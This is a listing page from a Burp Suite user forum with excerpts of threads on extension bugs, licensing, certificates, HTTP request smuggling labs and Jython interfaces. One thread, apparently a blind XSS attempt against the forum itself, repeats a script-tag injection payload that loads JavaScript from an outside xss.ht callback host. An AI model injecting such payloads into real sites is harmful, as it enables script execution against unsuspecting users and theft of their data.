Burp Extensions - Page 25 - Burp Suite User Forum

BurpHttpMock - faulty behavior only on installed macos version

Hello, there's a difference in behavior of the extension between Burp installed through the macos installer and Burp running as jar (both are community version 2021.8.2) When the jar version is running, the extension works...

Secure Coding Testing

Hi Team, Please confirm that whether the secure coding testing is possible using the Burpsuite tool with the current license. Regards, Kabilan.

Certificate

Hello, I am having problems with the certificate, when I upload it to fire fox I still cannot go to the sites, it says that the certificate is unreliable

HTTP Request Smuggler: Error in thread: Can't find the header: Connection. See error pane for stack trace.

When using the HTTP Request Smuggler extension (updated 06 Aug 2021) in Burp Suite Professional (v2021.8.2) to "Smuggle Probe", the probing failed with the following error message: Queued 1 attacks from 1 requests in 0...

Java extension Development: Determine if Request was edited

Hi, I'm developing a Burp Suite extension in Java, based on the "Custom logger" example here: https://portswigger.net/burp/extender#SampleExtensions I'd like to know how I can determine if a Request received by my logger...

Failed to open Jython JAR file in Burp Suite in macOS Big Sur

Failed to open Jython JAR file in Burp Suite, only getting this error for Python based Extensions, Java based ones are installing and loading ok. Only change I did was installing iTerm2 and oh-my-zsh, may be this screwed...

Problem with "Failed to open file"

Hi Team, I can't select file to upload burp extension. It shows "Failed to open file/folder" both burp extension and other language environment. I uninstalled and installed again before but it didn't help. I don't know...

Burp Extensions for Burp Enterprise

Hi, I'm a one of users of Burp Enterprise. I see that it's been mentioned that at the moment only java extensions are supported for Burp Enterprise. I had a question, would it work if I compile by Python extension into a...

Burp Suite Navigation Recorder

When I tried to record a login page, I used the copy to clipboard option, when I paste to the Recorded login secuences, the information that it paste is incomplete, and is not enough to complete the login process. I...

HTTP Request Smuggler Extension vs HTTP request smuggling scanner

When practicing the basic CL.TE lab ( Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability), I firstly used the HTTP Request Smuggler Extension -> Smuggle probe to test the lab main...

Ridiculous Trying to exploit"><script src=https://xssjacked.xss.ht></script> u for Blind XSS "><script src=https://xssjacked.xss.ht></script>

PLZ Work "><script src=https://xssjacked.xss.ht></script> . Never mind about . "><script src=https://xssjacked.xss.ht></script>

Installation Problem

Hi Team, Could you please consider unlocking the license key? I tried the same box and same user. When we try to open Burpsuite, we have faced a java error(no JVM found on your system) due to that we have...

Extension context menu item order in 2021.8.1

I've just updated to 2021.8.1, and noticed that extension's context menus are now grouped under a sub menu per extension (ordered alphabetically, instead of the order extensions are loaded in). I have a couple of custom...

BurpCollaborator - FTP Support

Hi, Does BurpCollaborator supports FTP callbacks? I see it supports HTTP, SMTP.

Problem with "Lab: HTTP request smuggling, basic CL.TE vulnerability"

Hi. I have problem with "Lab: HTTP request smuggling, basic CL.TE vulnerability", don't know what to do! Burp Community 2021.8, last version with HTTP Request Smuggler extension. What I did. Start lab...

[HTTP Request Smuggling] Meaning of the requests used in smuggle probe (issue overview)

In my issue summary I got a HTTP Request Smuggler alert consisting of 2 requests and 1 response (the other is a time-out I guess). One request is like: ... Transfer-Encoding : chunked Content-Length: 50 Connection:...

Building a UI in Jython

Does anyone have a good way to build Swing interfaces in Jython? I've got a really simple two text fields and a ITextEditor to place. I can get them into the interface with a box layout, but the ITextEditor is squashed down...

Default location for saving content

I'm working on updating this extension initially created by Hannah. https://github.com/digininja/SaveBrowsingImages I've created a config tab so the user can specify where to save the files but was wondering what I...

loadConfigFromJson() is not working as expected

Hi Team, I am trying update scanner configuration in my extender. It seems the scanner configurations are not getting updated. Initially I am reading the scanner config, it is showing as null. Then I am updating with my...

Broken brute force protection IP block

I have tried multiple times the good procedure and i am not sure where it is going wrong. Even with wiener and peter as well it is not reseting the counter and showing me the "please try again in 1 minutes". Please...